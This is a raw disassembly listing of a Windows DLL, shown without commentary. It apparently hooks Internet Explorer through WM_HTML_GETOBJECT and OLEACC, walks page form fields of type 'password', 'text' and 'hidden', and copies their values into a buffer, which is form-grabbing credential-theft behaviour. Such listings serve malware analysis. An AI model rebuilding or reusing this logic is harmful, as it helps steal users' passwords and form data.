mov ecx, [ebp+lParam]
push ecx ; lParam
mov edx, [ebp+wParam]
push edx ; wParam
mov eax, [ebp+nCode]
push eax ; nCode
mov ecx, dword_1006A964
push ecx ; hhk
call ds:CallNextHookEx ; CallNextHookEx
loc_100035FF: ; CODE XREF: sub_10003541+A3�j
mov esp, ebp
pop ebp
retn 0Ch
sub_10003541 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10003605 proc near ; CODE XREF: sub_10001D30+46�p
; sub_10004960+9C�p ...
push ebp
mov ebp, esp
cmp dword_1006A964, 0
jz short loc_10003623
cmp hWnd, 0
jz short loc_10003623
cmp Msg, 0
jnz short loc_10003627
loc_10003623: ; CODE XREF: sub_10003605+A�j
; sub_10003605+13�j
xor eax, eax
jmp short loc_10003643
; ---------------------------------------------------------------------------
loc_10003627: ; CODE XREF: sub_10003605+1C�j
push 0 ; lParam
push 2 ; wParam
mov eax, Msg
push eax ; Msg
mov ecx, hWnd
push ecx ; hWnd
call ds:SendMessageA ; SendMessageA
mov eax, 1
loc_10003643: ; CODE XREF: sub_10003605+20�j
pop ebp
retn
sub_10003605 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10003645 proc near ; CODE XREF: sub_10003541+39�p
var_7C = dword ptr -7Ch
Msg = dword ptr -78h
sz = word ptr -74h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
hLibModule = dword ptr -18h
dwResult = dword ptr -14h
pclsid = CLSID ptr -10h
push ebp
mov ebp, esp
sub esp, 7Ch
push esi
push edi
push 0 ; pvReserved
call ds:CoInitialize
push offset LibFileName ; "OLEACC.DLL"
call ds:LoadLibraryA ; LoadLibraryA
mov [ebp+hLibModule], eax
cmp [ebp+hLibModule], 0
jnz short loc_10003670
xor eax, eax
jmp loc_10003780
; ---------------------------------------------------------------------------
loc_10003670: ; CODE XREF: sub_10003645+22�j
mov [ebp+dwResult], 0
push offset aWm_html_getobj ; "WM_HTML_GETOBJECT"
call ds:RegisterWindowMessageA ; RegisterWindowMessageA
mov [ebp+Msg], eax
lea eax, [ebp+dwResult]
push eax ; lpdwResult
push 3E8h ; uTimeout
push 2 ; fuFlags
push 0 ; lParam
push 0 ; wParam
mov ecx, [ebp+Msg]
push ecx ; Msg
mov edx, hWnd
push edx ; hWnd
call ds:SendMessageTimeoutA ; SendMessageTimeoutA
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_100036B5
xor eax, eax
jmp loc_10003780
; ---------------------------------------------------------------------------
loc_100036B5: ; CODE XREF: sub_10003645+67�j
push offset aObjectfromlres ; "ObjectFromLresult"
mov eax, [ebp+hLibModule]
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_100036E4
mov ecx, [ebp+hLibModule]
push ecx ; hLibModule
call ds:FreeLibrary ; FreeLibrary
call ds:CoUninitialize
xor eax, eax
jmp loc_10003780
; ---------------------------------------------------------------------------
loc_100036E4: ; CODE XREF: sub_10003645+86�j
mov ecx, 13h
mov esi, offset a626fc520A41e11 ; "{626fc520-a41e-11cf-a731-00a0c9082637}"
lea edi, [ebp+sz]
rep movsd
movsw
lea edx, [ebp+pclsid]
push edx ; pclsid
lea eax, [ebp+sz]
push eax ; lpsz
call ds:CLSIDFromString
mov [ebp+var_7C], eax
cmp [ebp+var_7C], 0
jge short loc_10003720
mov ecx, [ebp+hLibModule]
push ecx ; hLibModule
call ds:FreeLibrary ; FreeLibrary
call ds:CoUninitialize
xor eax, eax
jmp short loc_10003780
; ---------------------------------------------------------------------------
loc_10003720: ; CODE XREF: sub_10003645+C5�j
mov ecx, offset dword_100281E0
call sub_1000E1F0
push eax
push 0
push offset dword_10023368
mov edx, [ebp+dwResult]
push edx
call [ebp+var_20]
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jl short loc_10003757
push 0
mov ecx, offset dword_100281E0
call sub_1000E180
and eax, 0FFh
test eax, eax
jz short loc_1000376B
loc_10003757: ; CODE XREF: sub_10003645+FB�j
mov eax, [ebp+hLibModule]
push eax ; hLibModule
call ds:FreeLibrary ; FreeLibrary
call ds:CoUninitialize
xor eax, eax
jmp short loc_10003780
; ---------------------------------------------------------------------------
loc_1000376B: ; CODE XREF: sub_10003645+110�j
mov ecx, [ebp+hLibModule]
push ecx ; hLibModule
call ds:FreeLibrary ; FreeLibrary
call ds:CoUninitialize
mov eax, 1
loc_10003780: ; CODE XREF: sub_10003645+26�j
; sub_10003645+6B�j ...
pop edi
pop esi
mov esp, ebp
pop ebp
retn
sub_10003645 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10003786 proc near ; CODE XREF: sub_10003541+42�p
var_2B0 = dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = dword ptr -2A8h
var_2A4 = dword ptr -2A4h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = dword ptr -284h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_244 = dword ptr -244h
var_240 = dword ptr -240h
var_23C = dword ptr -23Ch
pvargSrc = dword ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = byte ptr -228h
var_224 = dword ptr -224h
var_220 = byte ptr -220h
var_21C = dword ptr -21Ch
var_218 = byte ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_200 = dword ptr -200h
var_1FC = dword ptr -1FCh
var_1F8 = byte ptr -1F8h
var_1F4 = dword ptr -1F4h
var_1F0 = byte ptr -1F0h
var_1EC = dword ptr -1ECh
var_1E8 = byte ptr -1E8h
var_1E4 = dword ptr -1E4h
var_1E0 = byte ptr -1E0h
var_1DC = dword ptr -1DCh
var_1D8 = dword ptr -1D8h
var_1D4 = byte ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1CC = byte ptr -1CCh
var_1C8 = dword ptr -1C8h
var_1C4 = byte ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = byte ptr -1BCh
var_1B8 = dword ptr -1B8h
var_1B4 = byte ptr -1B4h
var_1B0 = dword ptr -1B0h
var_1AC = byte ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A4 = byte ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_198 = dword ptr -198h
var_194 = byte ptr -194h
var_190 = byte ptr -190h
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_178 = byte ptr -178h
var_168 = byte ptr -168h
var_158 = byte ptr -158h
var_148 = dword ptr -148h
var_144 = dword ptr -144h
Point = tagPOINT ptr -140h
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = byte ptr -128h
var_124 = byte ptr -124h
var_120 = byte ptr -120h
var_11C = byte ptr -11Ch
var_118 = byte ptr -118h
var_114 = byte ptr -114h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_108 = byte ptr -108h
var_104 = byte ptr -104h
var_100 = byte ptr -100h
var_FC = byte ptr -0FCh
var_F8 = byte ptr -0F8h
var_F4 = byte ptr -0F4h
var_F0 = byte ptr -0F0h
String = byte ptr -0ECh
var_EB = byte ptr -0EBh
lpString = dword ptr -0ACh
var_A8 = byte ptr -0A8h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
Str = dword ptr -78h
var_74 = byte ptr -74h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
lpString1 = dword ptr -44h
var_40 = byte ptr -40h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_10003786
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 2A4h
push esi
push edi
lea eax, [ebp+var_10]
push eax
mov ecx, offset dword_100281E0
call sub_1000E130
mov [ebp+var_230], eax
mov ecx, [ebp+var_230]
mov edx, [ecx]
mov eax, [ebp+var_230]
push eax
call dword ptr [edx+20h]
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jge short loc_100037DC
xor eax, eax
jmp loc_10004950
; ---------------------------------------------------------------------------
loc_100037DC: ; CODE XREF: sub_10003786+4D�j
push 8000h ; Size
push 0 ; Val
push offset String1 ; Dst
call memset ; memset
add esp, 0Ch
mov dword_10073974, 0
mov dword_10073978, 0
mov [ebp+String], 0
mov ecx, 0Fh
xor eax, eax
lea edi, [ebp+var_EB]
rep stosd
stosw
stosb
mov [ebp+lpString1], 0
mov ecx, 9
xor eax, eax
lea edi, [ebp+var_40]
rep stosd
mov [ebp+Str], 0
mov ecx, 9
xor eax, eax
lea edi, [ebp+var_74]
rep stosd
mov [ebp+lpString], 0
mov ecx, 9
xor eax, eax
lea edi, [ebp+var_A8]
rep stosd
mov [ebp+var_84], 0
mov [ebp+var_1C], 0
mov [ebp+var_80], 0
cmp dword_10022110, 3E8h
jge loc_1000396F
cmp dword_10022110, 0FFFFFFFFh
jz loc_1000396F
mov ecx, dword_10022110
mov edx, dword_10034464[ecx*4]
cmp dword ptr [edx+10h], 0
jz short loc_100038CC
push offset asc_100228AC ; ","
lea eax, [ebp+lpString1]
push eax ; int
mov ecx, dword_10022110
mov edx, dword_10034464[ecx*4]
mov eax, [edx+10h]
push eax ; Source
call sub_100011DC
add esp, 0Ch
mov [ebp+var_84], eax
loc_100038CC: ; CODE XREF: sub_10003786+11C�j
mov ecx, dword_10022110
mov edx, dword_10034464[ecx*4]
cmp dword ptr [edx+14h], 0
jz short loc_10003904
push offset asc_100228B0 ; ","
lea eax, [ebp+Str]
push eax ; int
mov ecx, dword_10022110
mov edx, dword_10034464[ecx*4]
mov eax, [edx+14h]
push eax ; Source
call sub_100011DC
add esp, 0Ch
mov [ebp+var_1C], eax
loc_10003904: ; CODE XREF: sub_10003786+157�j
mov ecx, dword_10022110
mov edx, dword_10034464[ecx*4]
cmp dword ptr [edx+18h], 0
jz short loc_1000393F
push offset asc_100228B4 ; ","
lea eax, [ebp+lpString]
push eax ; int
mov ecx, dword_10022110
mov edx, dword_10034464[ecx*4]
mov eax, [edx+18h]
push eax ; Source
call sub_100011DC
add esp, 0Ch
mov [ebp+var_80], eax
loc_1000393F: ; CODE XREF: sub_10003786+18F�j
mov ecx, dword_10022110
mov edx, dword_10034464[ecx*4]
cmp dword ptr [edx+0Ch], 0
jz short loc_1000396F
mov eax, dword_10022110
mov ecx, dword_10034464[eax*4]
mov edx, [ecx+0Ch]
push edx ; lpString2
lea eax, [ebp+String]
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
loc_1000396F: ; CODE XREF: sub_10003786+F8�j
; sub_10003786+105�j ...
lea ecx, [ebp+var_18]
call ??0_Container_base@std@@QAE@XZ ; std::_Container_base::_Container_base(void)
mov [ebp+var_4], 0
lea ecx, [ebp+var_14]
call ??0_Container_base@std@@QAE@XZ ; std::_Container_base::_Container_base(void)
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_7C]
push ecx
mov edx, [ebp+var_10]
mov eax, [edx]
mov ecx, [ebp+var_10]
push ecx
call dword ptr [eax+24h]
mov [ebp+var_4C], 0
jmp short loc_100039AC
; ---------------------------------------------------------------------------
loc_100039A3: ; CODE XREF: sub_10003786+413�j
; sub_10003786+784�j ...
mov edx, [ebp+var_4C]
add edx, 1
mov [ebp+var_4C], edx
loc_100039AC: ; CODE XREF: sub_10003786+21B�j
mov eax, [ebp+var_4C]
cmp eax, [ebp+var_7C]
jge loc_10004912
mov ecx, [ebp+var_4C]
push ecx
lea ecx, [ebp+var_168]
call sub_1000DAB0
mov [ebp+var_234], eax
mov edx, [ebp+var_234]
mov [ebp+pvargSrc], edx
mov byte ptr [ebp+var_4], 2
mov eax, [ebp+pvargSrc]
push eax ; pvargSrc
lea ecx, [ebp+var_158]
call sub_1000DA10
mov byte ptr [ebp+var_4], 3
mov ecx, [ebp+var_4C]
push ecx
lea ecx, [ebp+var_188]
call sub_1000DAB0
mov [ebp+var_23C], eax
mov edx, [ebp+var_23C]
mov [ebp+var_240], edx
mov byte ptr [ebp+var_4], 4
mov eax, [ebp+var_240]
push eax ; pvargSrc
lea ecx, [ebp+var_178]
call sub_1000DA10
mov byte ptr [ebp+var_4], 5
lea ecx, [ebp+var_158]
push ecx
lea edx, [ebp+var_178]
push edx
lea eax, [ebp+var_18C]
push eax
mov ecx, [ebp+var_10]
call sub_1000DDE0
mov [ebp+var_244], eax
mov ecx, [ebp+var_244]
call unknown_libname_1 ; Microsoft VisualC 2-8/net runtime
mov [ebp+var_110], eax
lea ecx, [ebp+var_18C]
call sub_1000E1D0
mov byte ptr [ebp+var_4], 4
lea ecx, [ebp+var_178]
call sub_1000DA70
mov byte ptr [ebp+var_4], 3
lea ecx, [ebp+var_188]
call sub_1000DA90
mov byte ptr [ebp+var_4], 2
lea ecx, [ebp+var_158]
call sub_1000DA70
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_168]
call sub_1000DA90
lea ecx, [ebp+var_100]
call ??0_Container_base@std@@QAE@XZ_1 ; std::_Container_base::_Container_base(void)
mov byte ptr [ebp+var_4], 6
lea ecx, [ebp+var_100]
call sub_1000E1F0
push eax
mov ecx, [ebp+var_110]
push ecx
call sub_1000E340
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jl short loc_10003B4B
lea edx, [ebp+var_190]
push edx
lea ecx, [ebp+var_100]
call sub_1000E130
mov ecx, eax
call sub_1000DB20
mov [ebp+var_248], eax
mov eax, [ebp+var_248]
push eax
lea ecx, [ebp+var_18]
call sub_1000D640
lea ecx, [ebp+var_190]
call sub_1000D620
lea ecx, [ebp+var_194]
push ecx
lea ecx, [ebp+var_100]
call sub_1000E130
mov ecx, eax
call sub_1000DC80
mov [ebp+var_24C], eax
mov edx, [ebp+var_24C]
push edx
lea ecx, [ebp+var_14]
call sub_1000D640
lea ecx, [ebp+var_194]
call sub_1000D620
loc_10003B4B: ; CODE XREF: sub_10003786+351�j
lea ecx, [ebp+var_F4]
call ??0_Container_base@std@@QAE@XZ_1 ; std::_Container_base::_Container_base(void)
mov byte ptr [ebp+var_4], 7
lea ecx, [ebp+var_F4]
call sub_1000E1F0
push eax
mov eax, [ebp+var_110]
push eax
call sub_1000E360
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jge short loc_10003B9E
mov byte ptr [ebp+var_4], 6
lea ecx, [ebp+var_F4]
call sub_1000E1D0
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_100]
call sub_1000E1D0
jmp loc_100039A3
; ---------------------------------------------------------------------------
loc_10003B9E: ; CODE XREF: sub_10003786+3F3�j
push offset MultiByteStr ; "password"
lea ecx, [ebp+var_10C]
call ?register_callback@ios_base@std@@QAEXP6AXW4event@12@AAV12@H@ZH@Z ; std::ios_base::register_callback(void (*)(std::ios_base::event,std::ios_base &,int),int)
mov byte ptr [ebp+var_4], 8
push offset aText ; "text"
lea ecx, [ebp+var_F0]
call ?register_callback@ios_base@std@@QAEXP6AXW4event@12@AAV12@H@ZH@Z ; std::ios_base::register_callback(void (*)(std::ios_base::event,std::ios_base &,int),int)
mov byte ptr [ebp+var_4], 9
push offset aHidden ; "hidden"
lea ecx, [ebp+var_108]
call ?register_callback@ios_base@std@@QAEXP6AXW4event@12@AAV12@H@ZH@Z ; std::ios_base::register_callback(void (*)(std::ios_base::event,std::ios_base &,int),int)
mov byte ptr [ebp+var_4], 0Ah
push offset aSubmit ; "submit"
lea ecx, [ebp+var_FC]
call ?register_callback@ios_base@std@@QAEXP6AXW4event@12@AAV12@H@ZH@Z ; std::ios_base::register_callback(void (*)(std::ios_base::event,std::ios_base &,int),int)
mov byte ptr [ebp+var_4], 0Bh
push offset aButton ; "button"
lea ecx, [ebp+var_104]
call ?register_callback@ios_base@std@@QAEXP6AXW4event@12@AAV12@H@ZH@Z ; std::ios_base::register_callback(void (*)(std::ios_base::event,std::ios_base &,int),int)
mov byte ptr [ebp+var_4], 0Ch
push offset aImage ; "image"
lea ecx, [ebp+var_F8]
call ?register_callback@ios_base@std@@QAEXP6AXW4event@12@AAV12@H@ZH@Z ; std::ios_base::register_callback(void (*)(std::ios_base::event,std::ios_base &,int),int)
mov byte ptr [ebp+var_4], 0Dh
lea ecx, [ebp+var_104]
push ecx
lea edx, [ebp+var_19C]
push edx
lea ecx, [ebp+var_F4]
call sub_1000E130
mov ecx, eax
call sub_1000DF10
mov [ebp+var_250], eax
mov eax, [ebp+var_250]
mov [ebp+var_254], eax
mov byte ptr [ebp+var_4], 0Eh
mov ecx, [ebp+var_254]
call sub_1000D6A0
and eax, 0FFh
test eax, eax
jnz loc_10003E11
lea ecx, [ebp+var_F8]
push ecx
lea edx, [ebp+var_1A4]
push edx
lea ecx, [ebp+var_F4]
call sub_1000E130
mov ecx, eax
call sub_1000DF10
mov [ebp+var_258], eax
mov ecx, [ebp+var_258]
call sub_1000D6A0
mov byte ptr [ebp+var_1A0], al
lea ecx, [ebp+var_1A4]
call sub_1000D620
mov eax, [ebp+var_1A0]
and eax, 0FFh
test eax, eax
jnz loc_10003E11
lea ecx, [ebp+var_10C]
push ecx
lea edx, [ebp+var_1AC]
push edx
lea ecx, [ebp+var_F4]
call sub_1000E130
mov ecx, eax
call sub_1000DF10
mov [ebp+var_25C], eax
mov ecx, [ebp+var_25C]
call sub_1000D6A0
mov byte ptr [ebp+var_1A8], al
lea ecx, [ebp+var_1AC]
call sub_1000D620
mov eax, [ebp+var_1A8]
and eax, 0FFh
test eax, eax
jnz loc_10003E11
lea ecx, [ebp+var_F0]
push ecx
lea edx, [ebp+var_1B4]
push edx
lea ecx, [ebp+var_F4]
call sub_1000E130
mov ecx, eax
call sub_1000DF10
mov [ebp+var_260], eax
mov ecx, [ebp+var_260]
call sub_1000D6A0
mov byte ptr [ebp+var_1B0], al
lea ecx, [ebp+var_1B4]
call sub_1000D620
mov eax, [ebp+var_1B0]
and eax, 0FFh
test eax, eax
jnz loc_10003E11
lea ecx, [ebp+var_108]
push ecx
lea edx, [ebp+var_1BC]
push edx
lea ecx, [ebp+var_F4]
call sub_1000E130
mov ecx, eax
call sub_1000DF10
mov [ebp+var_264], eax
mov ecx, [ebp+var_264]
call sub_1000D6A0
mov byte ptr [ebp+var_1B8], al
lea ecx, [ebp+var_1BC]
call sub_1000D620
mov eax, [ebp+var_1B8]
and eax, 0FFh
test eax, eax
jnz short loc_10003E11
lea ecx, [ebp+var_FC]
push ecx
lea edx, [ebp+var_1C4]
push edx
lea ecx, [ebp+var_F4]
call sub_1000E130
mov ecx, eax
call sub_1000DF10
mov [ebp+var_268], eax
mov ecx, [ebp+var_268]
call sub_1000D6A0
mov byte ptr [ebp+var_1C0], al
lea ecx, [ebp+var_1C4]
call sub_1000D620
mov eax, [ebp+var_1C0]
and eax, 0FFh
test eax, eax
jnz short loc_10003E11
mov [ebp+var_26C], 0
jmp short loc_10003E1B
; ---------------------------------------------------------------------------
loc_10003E11: ; CODE XREF: sub_10003786+4D8�j
; sub_10003786+52D�j ...
mov [ebp+var_26C], 1
loc_10003E1B: ; CODE XREF: sub_10003786+689�j
mov cl, byte ptr [ebp+var_26C]
mov byte ptr [ebp+var_198], cl
mov byte ptr [ebp+var_4], 0Dh
lea ecx, [ebp+var_19C]
call sub_1000D620
mov edx, [ebp+var_198]
and edx, 0FFh
test edx, edx
jz loc_10004879
lea ecx, [ebp+var_118]
call ??0_Container_base@std@@QAE@XZ_1 ; std::_Container_base::_Container_base(void)
mov byte ptr [ebp+var_4], 0Fh
lea ecx, [ebp+var_118]
call sub_1000E1F0
push eax
lea ecx, [ebp+var_F4]
call sub_1000E130
push eax
call sub_1000E380
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jge loc_10003F0F
mov byte ptr [ebp+var_4], 0Dh
lea ecx, [ebp+var_118]
call sub_1000E1D0
mov byte ptr [ebp+var_4], 0Ch
lea ecx, [ebp+var_F8]
call sub_1000D620
mov byte ptr [ebp+var_4], 0Bh
lea ecx, [ebp+var_104]
call sub_1000D620
mov byte ptr [ebp+var_4], 0Ah
lea ecx, [ebp+var_FC]
call sub_1000D620
mov byte ptr [ebp+var_4], 9
lea ecx, [ebp+var_108]
call sub_1000D620
mov byte ptr [ebp+var_4], 8
lea ecx, [ebp+var_F0]
call sub_1000D620
mov byte ptr [ebp+var_4], 7
lea ecx, [ebp+var_10C]
call sub_1000D620
mov byte ptr [ebp+var_4], 6
lea ecx, [ebp+var_F4]
call sub_1000E1D0
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_100]
call sub_1000E1D0
jmp loc_100039A3
; ---------------------------------------------------------------------------
loc_10003F0F: ; CODE XREF: sub_10003786+6F7�j
lea ecx, [ebp+var_114]
call ??0_Container_base@std@@QAE@XZ_1 ; std::_Container_base::_Container_base(void)
mov byte ptr [ebp+var_4], 10h
lea eax, [ebp+var_11C]
push eax
lea ecx, [ebp+var_F4]
call sub_1000E130
mov ecx, eax
call sub_1000DF70
mov byte ptr [ebp+var_4], 11h
lea ecx, [ebp+var_120]
push ecx
lea ecx, [ebp+var_F4]
call sub_1000E130
mov ecx, eax
call sub_1000DFD0
mov byte ptr [ebp+var_4], 12h
lea edx, [ebp+var_128]
push edx
lea ecx, [ebp+var_F4]
call sub_1000E130
mov ecx, eax
call sub_1000E030
mov byte ptr [ebp+var_4], 13h
lea eax, [ebp+var_124]
push eax
lea ecx, [ebp+var_F4]
call sub_1000E130
mov ecx, eax
call sub_1000E090
mov byte ptr [ebp+var_4], 14h
lea ecx, [ebp+var_F8]
push ecx
lea edx, [ebp+var_1CC]
push edx
lea ecx, [ebp+var_F4]
call sub_1000E130
mov ecx, eax
call sub_1000DF10
mov [ebp+var_270], eax
mov eax, [ebp+var_270]
mov [ebp+var_274], eax
mov byte ptr [ebp+var_4], 15h
mov ecx, [ebp+var_274]
call sub_1000D6C0
and eax, 0FFh
test eax, eax
jz loc_1000406B
lea ecx, [ebp+var_FC]
push ecx
lea edx, [ebp+var_1D4]
push edx
lea ecx, [ebp+var_F4]
call sub_1000E130
mov ecx, eax
call sub_1000DF10
mov [ebp+var_278], eax
mov ecx, [ebp+var_278]
call sub_1000D6C0
mov byte ptr [ebp+var_1D0], al
lea ecx, [ebp+var_1D4]
call sub_1000D620
mov eax, [ebp+var_1D0]
and eax, 0FFh
test eax, eax
jz short loc_1000406B
lea ecx, [ebp+var_120]
call sub_1000D670
push eax ; lpString
call ds:lstrlenA ; lstrlenA
neg eax
sbb eax, eax
neg eax
mov byte ptr [ebp+var_1D8], al
mov ecx, [ebp+var_1D8]
and ecx, 0FFh
test ecx, ecx
jz short loc_1000406B
mov [ebp+var_27C], 1
jmp short loc_10004075
; ---------------------------------------------------------------------------
loc_1000406B: ; CODE XREF: sub_10003786+854�j
; sub_10003786+8A9�j ...
mov [ebp+var_27C], 0
loc_10004075: ; CODE XREF: sub_10003786+8E3�j
mov dl, byte ptr [ebp+var_27C]
mov byte ptr [ebp+var_1C8], dl
mov byte ptr [ebp+var_4], 14h
lea ecx, [ebp+var_1CC]
call sub_1000D620
mov eax, [ebp+var_1C8]
and eax, 0FFh
test eax, eax
jz short loc_100040B6
lea ecx, [ebp+var_120]
call sub_1000D670
push eax ; lpString2
push offset String1 ; lpString1
call ds:lstrcatA ; lstrcatA
loc_100040B6: ; CODE XREF: sub_10003786+917�j
lea ecx, [ebp+var_108]
push ecx
lea edx, [ebp+var_1E0]
push edx
lea ecx, [ebp+var_F4]
call sub_1000E130
mov ecx, eax
call sub_1000DF10
mov [ebp+var_280], eax
mov eax, [ebp+var_280]
mov [ebp+var_284], eax
mov byte ptr [ebp+var_4], 16h
mov ecx, [ebp+var_284]
call sub_1000D6A0
and eax, 0FFh
test eax, eax
jnz loc_100041FF
lea ecx, [ebp+var_104]
push ecx
lea edx, [ebp+var_1E8]
push edx
lea ecx, [ebp+var_F4]
call sub_1000E130
mov ecx, eax
call sub_1000DF10
mov [ebp+var_288], eax
mov ecx, [ebp+var_288]
call sub_1000D6A0
mov byte ptr [ebp+var_1E4], al
lea ecx, [ebp+var_1E8]
call sub_1000D620
mov eax, [ebp+var_1E4]
and eax, 0FFh
test eax, eax
jnz loc_100041FF
lea ecx, [ebp+var_F8]
push ecx
lea edx, [ebp+var_1F0]
push edx
lea ecx, [ebp+var_F4]
call sub_1000E130
mov ecx, eax
call sub_1000DF10
mov [ebp+var_28C], eax
mov ecx, [ebp+var_28C]
call sub_1000D6A0
mov byte ptr [ebp+var_1EC], al
lea ecx, [ebp+var_1F0]
call sub_1000D620
mov eax, [ebp+var_1EC]
and eax, 0FFh
test eax, eax
jnz short loc_100041FF
lea ecx, [ebp+var_FC]
push ecx
lea edx, [ebp+var_1F8]
push edx
lea ecx, [ebp+var_F4]
call sub_1000E130
mov ecx, eax
call sub_1000DF10
mov [ebp+var_290], eax
mov ecx, [ebp+var_290]
call sub_1000D6A0
mov byte ptr [ebp+var_1F4], al
lea ecx, [ebp+var_1F8]
call sub_1000D620
mov eax, [ebp+var_1F4]
and eax, 0FFh
test eax, eax
jz loc_1000438F
loc_100041FF: ; CODE XREF: sub_10003786+978�j
; sub_10003786+9CD�j ...
lea ecx, [ebp+String]
push ecx ; lpString
call ds:lstrlenA ; lstrlenA
xor edx, edx
test eax, eax
setnle dl
mov byte ptr [ebp+var_1FC], dl
mov eax, [ebp+var_1FC]
and eax, 0FFh
test eax, eax
jz loc_1000438F
lea ecx, [ebp+String]
push ecx ; lpString2
lea ecx, [ebp+var_120]
call sub_1000D670
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jz loc_1000435D
lea edx, [ebp+String]
push edx ; lpString2
lea ecx, [ebp+var_124]
call sub_1000D670
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
neg eax
sbb eax, eax
inc eax
mov byte ptr [ebp+var_204], al
mov eax, [ebp+var_204]
and eax, 0FFh
test eax, eax
jnz loc_1000435D
lea ecx, [ebp+String]
push ecx ; lpString2
lea ecx, [ebp+var_128]
call sub_1000D670
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
neg eax
sbb eax, eax
inc eax
mov byte ptr [ebp+var_208], al
mov edx, [ebp+var_208]
and edx, 0FFh
test edx, edx
jnz loc_1000435D
lea eax, [ebp+String]
push eax ; lpString2
lea ecx, [ebp+var_11C]
call sub_1000D670
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
neg eax
sbb eax, eax
inc eax
mov byte ptr [ebp+var_20C], al
mov ecx, [ebp+var_20C]
and ecx, 0FFh
test ecx, ecx
jnz short loc_1000435D
lea edx, [ebp+String]
push edx ; lpString2
lea ecx, [ebp+var_18]
call sub_1000D670
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
neg eax
sbb eax, eax
inc eax
mov byte ptr [ebp+var_210], al
mov eax, [ebp+var_210]
and eax, 0FFh
test eax, eax
jnz short loc_1000435D
lea ecx, [ebp+String]
push ecx ; lpString2
lea ecx, [ebp+var_14]
call sub_1000D670
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
neg eax
sbb eax, eax
inc eax
mov byte ptr [ebp+var_214], al
mov edx, [ebp+var_214]
and edx, 0FFh
test edx, edx
jnz short loc_1000435D
mov [ebp+var_294], 0
jmp short loc_10004367
; ---------------------------------------------------------------------------
loc_1000435D: ; CODE XREF: sub_10003786+AC1�j
; sub_10003786+AF8�j ...
mov [ebp+var_294], 1
loc_10004367: ; CODE XREF: sub_10003786+BD5�j
mov al, byte ptr [ebp+var_294]
mov byte ptr [ebp+var_200], al
mov ecx, [ebp+var_200]
and ecx, 0FFh
test ecx, ecx
jz short loc_1000438F
mov [ebp+var_298], 1
jmp short loc_10004399
; ---------------------------------------------------------------------------
loc_1000438F: ; CODE XREF: sub_10003786+A73�j
; sub_10003786+AA0�j ...
mov [ebp+var_298], 0
loc_10004399: ; CODE XREF: sub_10003786+C07�j
mov dl, byte ptr [ebp+var_298]
mov byte ptr [ebp+var_1DC], dl
mov byte ptr [ebp+var_4], 14h
lea ecx, [ebp+var_1E0]
call sub_1000D620
mov eax, [ebp+var_1DC]
and eax, 0FFh
test eax, eax
jz loc_100044C6
lea ecx, [ebp+var_218]
push ecx
lea ecx, [ebp+var_118]
call sub_1000E130
mov ecx, eax
call sub_1000DEB0
mov [ebp+var_29C], eax
mov edx, [ebp+var_29C]
push edx
lea ecx, [ebp+var_114]
call sub_1000E270
lea ecx, [ebp+var_218]
call sub_1000E1D0
lea ecx, [ebp+var_114]
call sub_1000E130
mov ecx, eax
call sub_1000DCE0
mov [ebp+var_138], eax
lea ecx, [ebp+var_114]
call sub_1000E130
mov ecx, eax
call sub_1000DD20
mov [ebp+var_134], eax
lea ecx, [ebp+var_114]
call sub_1000E130
mov ecx, eax
call sub_1000DD60
mov [ebp+var_130], eax
lea ecx, [ebp+var_114]
call sub_1000E130
mov ecx, eax
call sub_1000DDA0
mov [ebp+var_12C], eax
